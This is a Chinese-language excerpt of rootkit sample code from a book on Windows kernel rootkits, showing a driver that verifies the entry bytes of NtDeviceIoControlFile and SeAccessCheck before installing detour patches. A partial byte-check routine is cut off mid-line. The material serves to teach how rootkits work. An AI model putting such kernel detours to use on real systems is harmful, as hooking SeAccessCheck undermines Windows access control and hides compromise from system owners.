本文和代码来自《Rootkits——Windows 内核的安全防护》。
下面展示一个 rootkit 示例，用以说明对内核函数所做的 detour 补丁。
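#include "ntddk.h"

/*
 * Prototype of the kernel service whose entry bytes are checked (and later
 * patched) below.  It is exported by the kernel, not defined in this file.
 */
NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile(
    IN HANDLE hFile,
    IN HANDLE hEvent OPTIONAL,
    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
    IN PVOID IoApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    IN ULONG DeviceIoControlCode,
    IN PVOID InBuffer OPTIONAL,
    IN ULONG InBufferLength,
    OUT PVOID OutBuffer OPTIONAL,
    IN ULONG OutBufferLength
    );

/*
 * Forward declarations for the helpers DriverEntry calls.  Without them the
 * calls below are implicit declarations (invalid since C99).  The Check*
 * helpers return STATUS_SUCCESS only when the target function still begins
 * with the expected prologue bytes.  The Detour* helpers are declared void
 * here because their result is never used; if their definitions return a
 * value, adjust these declarations to match.
 */
NTSTATUS CheckFunctionBytesNtDeviceIoControlFile(void);
NTSTATUS CheckFunctionBytesSeAccessCheck(void);
void DetourFunctionNtDeviceIoControlFile(void);
void DetourFunctionSeAccessCheck(void);

/*
 * DriverEntry - driver load routine.
 *
 * Before either function is touched, verifies that NtDeviceIoControlFile and
 * SeAccessCheck still begin with the byte sequence the Check* helpers expect
 * (i.e. that they have not already been detoured).  A mismatch fails the load
 * with STATUS_UNSUCCESSFUL; because both checks run before any Detour* call,
 * nothing has been patched when that happens.  Only when both checks pass are
 * the detours installed.
 *
 * @param theDriverObject  driver object supplied by the I/O manager.
 * @param theRegistryPath  service registry key path; unused.
 * @return STATUS_SUCCESS when both detours were installed,
 *         STATUS_UNSUCCESSFUL when a prologue check failed.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath)
{
    UNREFERENCED_PARAMETER(theRegistryPath);

    DbgPrint("My Driver Loaded!");

    /*
     * TODO!! theDriverObject->DriverUnload = OnUnload;
     * Until an unload routine is set the driver cannot be unloaded, and
     * nothing in this routine restores the patched functions.
     */
    UNREFERENCED_PARAMETER(theDriverObject);

    /* Refuse to patch a function whose entry bytes are not the expected ones. */
    if (STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile())
    {
        DbgPrint("Match Failure on NtDeviceIoControlFile!");
        return STATUS_UNSUCCESSFUL;
    }

    if (STATUS_SUCCESS != CheckFunctionBytesSeAccessCheck())
    {
        DbgPrint("Match Failure on SeAccessCheck!");
        return STATUS_UNSUCCESSFUL;
    }

    /* Both prologues matched: install the detours. */
    DetourFunctionNtDeviceIoControlFile();
    DetourFunctionSeAccessCheck();

    return STATUS_SUCCESS;
}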
检查 NtDeviceIoControlFile 是否已经被 detour 过
1 NTSTATUS CheckFunctionBytesNtDeviceIoControlFile() 2 { 3 int i=0; 4 char *p = (char *)NtDeviceIoControlFile; 5 6 //The beginning of the NtDeviceIoControlFile function 7 //should match: 8 //55 PUSH EBP 9 //8BEC MOV EBP, ESP 10 //6A01 PUSH 01 11 //FF752C PUSH DWORD PTR [EBP + 2C] 12 13 char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C }; 14 15 while(i<8) 16 { 17 DbgPrint(" - 0x%02X "